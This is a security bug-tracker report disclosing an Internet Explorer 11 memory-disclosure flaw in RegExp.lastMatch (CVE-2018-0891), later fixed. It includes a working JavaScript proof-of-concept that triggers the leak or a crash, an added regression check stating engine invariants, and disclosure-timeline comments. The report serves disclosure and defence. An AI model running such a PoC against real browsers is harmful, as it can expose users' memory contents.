Issue 1461

Status: Fixed
Closed: Mar 2018

IE11: RegExp.lastMatch memory disclosure

Reported by ifratric@google.com (Project Member), Dec 6 2017

Issue description

There is a vulnerability in Internet Explorer that could potentially be used for memory disclosure.

This was tested on IE11 running on Windows 7 64-bit with the latest patches applied.

PoC:

=========================================

<!-- saved from url=(0014)about:internet -->
<script>

function main() {
  // RegExp.input is set to an object whose toString runs when the engine
  // converts it to a string, i.e. while RegExp.lastMatch is being read below.
  RegExp.input = {toString: f};
  alert(RegExp.lastMatch);
}

// Haystack: just under 10 million "a", a run of ten "b", then 99 more "a".
var input = [Array(10000000).join("a"), Array(11).join("b"), Array(100).join("a")].join("");

function f() {
  // Re-entrant match: runs a fresh search, which updates the RegExp statics
  // (lastMatch, input) while the outer RegExp.lastMatch read is still in progress.
  String.prototype.match.call(input, "bbbbbbbbbb");
}

main();

</script>

=========================================

Note that sometimes the PoC results in a crash (I made no attempt to make it reliable) while sometimes it results in pieces of memory being displayed (see the attached screenshot).


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.
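A regression-style check for this class of bug, added here and not part of the report or of any Microsoft code: it replays the report's sequence (a toString callback that performs a fresh match while RegExp.input is being converted) on a much smaller haystack, then asserts invariants that any correct engine must uphold. The value read back from RegExp.lastMatch has to be a string, no longer than the haystack, and made only of characters that actually occur in the haystack; anything else means the accessor handed back data that never belonged to the matched string, which is the symptom shown in the attached screenshot. The names HAYSTACK, NEEDLE and checkLastMatchReentrancy are chosen for this example, and the sample strings are constructed.

```javascript
// Constructed sample input (not the report's 10 MB string): a long run of "a",
// a ten-character run of "b", then a short tail of "a".
const NEEDLE = "b".repeat(10);
const HAYSTACK = "a".repeat(100000) + NEEDLE + "a".repeat(99);

// Replays the re-entrant RegExp.input / RegExp.lastMatch sequence and returns
// { ok, reentered, reason }. ok === false means lastMatch returned data that is
// inconsistent with the haystack, i.e. the memory-disclosure symptom.
function checkLastMatchReentrancy() {
  const allowed = new Set(HAYSTACK); // the haystack's alphabet: {"a", "b"}
  let reentered = false;

  // toString is invoked whenever the engine converts RegExp.input to a string.
  // It re-enters the RegExp machinery by running a new match, as the PoC does.
  const reentrant = {
    toString() {
      reentered = true;
      String.prototype.match.call(HAYSTACK, NEEDLE);
      return HAYSTACK;
    },
  };

  let value;
  try {
    RegExp.input = reentrant;
    value = RegExp.lastMatch;
  } catch (e) {
    // Refusing the conversion is a safe outcome; only bad data is a finding.
    return { ok: true, reentered, reason: "engine threw " + e.name };
  }

  if (typeof value !== "string") {
    return { ok: false, reentered, reason: "lastMatch is not a string" };
  }
  if (value.length > HAYSTACK.length) {
    return { ok: false, reentered, reason: "lastMatch longer than the haystack" };
  }
  for (const ch of value) {
    if (!allowed.has(ch)) {
      // A character that never appeared in the haystack can only come from
      // memory that was not part of the matched string.
      return { ok: false, reentered, reason: "foreign character " + JSON.stringify(ch) };
    }
  }
  return { ok: true, reentered, reason: "lastMatch consistent with the haystack" };
}

console.log(JSON.stringify(checkLastMatchReentrancy()));
```

In a current engine the check passes: the inner match simply updates the statics, and lastMatch reads back as the ten "b" characters. Because the invariants are stated in terms of the haystack rather than a specific expected value, the same check is meaningful regardless of whether an engine converts RegExp.input eagerly at assignment time or lazily when lastMatch is read.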

Comment 1 by ifratric@google.com (Project Member), Dec 6 2017

Attachment: leak3.png (31.3 KB)

Comment 2 by ifratric@google.com (Project Member), Feb 20 2018

Labels: CVE-2018-0891

Comment 3 by ifratric@google.com (Project Member), Mar 1 2018

Labels: Deadline-Grace

Comment 4 by ifratric@google.com (Project Member), Mar 20 2018

Labels: -Restrict-View-Commit
Status: Fixed (was: New)
Fixed in https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-0891
